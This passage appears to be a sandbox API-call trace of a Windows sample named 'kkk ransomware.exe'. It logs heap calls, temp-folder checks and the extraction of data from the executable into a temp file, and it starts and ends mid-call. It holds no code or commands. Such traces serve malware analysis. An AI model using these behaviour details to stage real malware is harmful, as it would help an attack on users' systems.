lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0224.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3854008 [0224.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0224.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0224.377] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.378] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf814 | out: lpNewFilePointer=0x0) returned 1 [0224.378] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.378] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf7f4 | out: lpNewFilePointer=0x0) returned 1 [0224.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0224.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0224.378] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf808 | out: lpNewFilePointer=0x0) returned 1 [0224.379] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf81c, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf81c*=0x0, lpOverlapped=0x0) returned 1 [0224.379] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.379] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf7f4 | out: lpNewFilePointer=0x0) returned 1 [0224.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0224.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0224.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0224.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0224.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2a72318, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0224.380] WriteFile (in: hFile=0x520, lpBuffer=0x2aab710*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x8cf818, lpOverlapped=0x0 | out: lpBuffer=0x2aab710*, lpNumberOfBytesWritten=0x8cf818*=0x0, lpOverlapped=0x0) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0224.380] CloseHandle (hObject=0x520) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854008 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.381] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0224.381] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0224.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0224.381] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eac90 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac90 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0224.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0224.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0224.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2a72268, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0224.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0224.385] GetLastError () returned 0x0 [0224.385] SetLastError (dwErrCode=0x0) [0224.385] GetLastError () returned 0x0 [0224.385] SetLastError (dwErrCode=0x0) [0224.386] GetLastError () returned 0x0 [0224.386] SetLastError (dwErrCode=0x0) [0224.386] GetLastError () returned 0x0 [0224.386] SetLastError (dwErrCode=0x0) [0224.386] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.387] SetLastError (dwErrCode=0x0) [0224.387] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.388] SetLastError (dwErrCode=0x0) [0224.388] GetLastError () returned 0x0 [0224.389] SetLastError (dwErrCode=0x0) [0224.389] GetLastError () returned 0x0 [0224.389] SetLastError (dwErrCode=0x0) [0224.389] GetLastError () returned 0x0 [0224.389] SetLastError (dwErrCode=0x0) [0224.389] GetLastError () returned 0x0 [0224.389] SetLastError (dwErrCode=0x0) [0224.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8ceb5c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0224.423] GetFileType (hFile=0x520) returned 0x1 [0224.426] ReadFile (in: hFile=0x520, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0224.427] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0224.456] SetFilePointer (in: hFile=0x520, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0224.456] ReadFile (in: hFile=0x520, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0224.456] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0224.456] SetFilePointer (in: hFile=0x520, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0224.457] ReadFile (in: hFile=0x520, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0224.457] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0224.457] SetFilePointer (in: hFile=0x520, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0224.457] ReadFile (in: hFile=0x520, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0224.458] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0224.458] SetFilePointer (in: hFile=0x520, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0224.458] ReadFile (in: hFile=0x520, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0224.459] SetFilePointer (in: hFile=0x520, lDistanceToMove=317460, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d814 [0224.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x3854008 [0224.460] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8beb44, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8beb44*=0x1000, lpOverlapped=0x0) returned 1 [0224.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ceb74 | out: lpSystemTimeAsFileTime=0x8ceb74*(dwLowDateTime=0x835f4d6a, dwHighDateTime=0x1d5dff9)) [0224.462] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e814 [0224.492] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg")) returned 0xffffffff [0224.493] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8cebe0 | out: lpFindFileData=0x8cebe0*(dwFileAttributes=0x3, ftCreationTime.dwLowDateTime=0x8cebf0, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x2af0894, ftLastAccessTime.dwHighDateTime=0x8cec30, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0xd1d4cc25, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0224.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bdc54 | out: lpSystemTimeAsFileTime=0x8bdc54*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.494] SetFilePointer (in: hFile=0x520, lDistanceToMove=317480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d828 [0224.494] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0224.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.494] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4da28 [0224.494] SetFilePointer (in: hFile=0x520, lDistanceToMove=317621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d8b5 [0224.494] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0224.495] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4dab5 [0224.495] SetFilePointer (in: hFile=0x520, lDistanceToMove=333987, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x518a3 [0224.495] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0224.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x8365fdc3, dwHighDateTime=0x1d5dff9)) [0224.495] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bda68 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0224.495] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8be128 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autD9D3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autd9d3.tmp")) returned 0xd9d3 [0224.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autD9D3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autd9d3.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8bdb3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0224.497] GetFileType (hFile=0x4e0) returned 0x1 [0224.497] ReadFile (in: hFile=0x520, lpBuffer=0x8befbf, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befbf*, lpNumberOfBytesRead=0x8bdb78*=0xf000, lpOverlapped=0x0) returned 1 [0224.498] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bdb68*=0x1000, lpOverlapped=0x0) returned 1 [0224.500] WriteFile (in: hFile=0x4e0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0x10000, lpOverlapped=0x0) returned 1 [0224.502] ReadFile (in: hFile=0x520, lpBuffer=0x8befbf, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befbf*, lpNumberOfBytesRead=0x8bdb78*=0xf000, lpOverlapped=0x0) returned 1 [0224.502] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bdb68*=0x1000, lpOverlapped=0x0) returned 1 [0224.505] WriteFile (in: hFile=0x4e0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0x10000, lpOverlapped=0x0) returned 1 [0224.506] ReadFile (in: hFile=0x520, lpBuffer=0x8befbf, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befbf*, lpNumberOfBytesRead=0x8bdb78*=0xf000, lpOverlapped=0x0) returned 1 [0224.507] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8bdb68*=0x1000, lpOverlapped=0x0) returned 1 [0224.510] WriteFile (in: hFile=0x4e0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0x10000, lpOverlapped=0x0) returned 1 [0224.511] ReadFile (in: hFile=0x520, lpBuffer=0x8befbf, nNumberOfBytesToRead=0xb000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befbf*, lpNumberOfBytesRead=0x8bdb78*=0xb000, 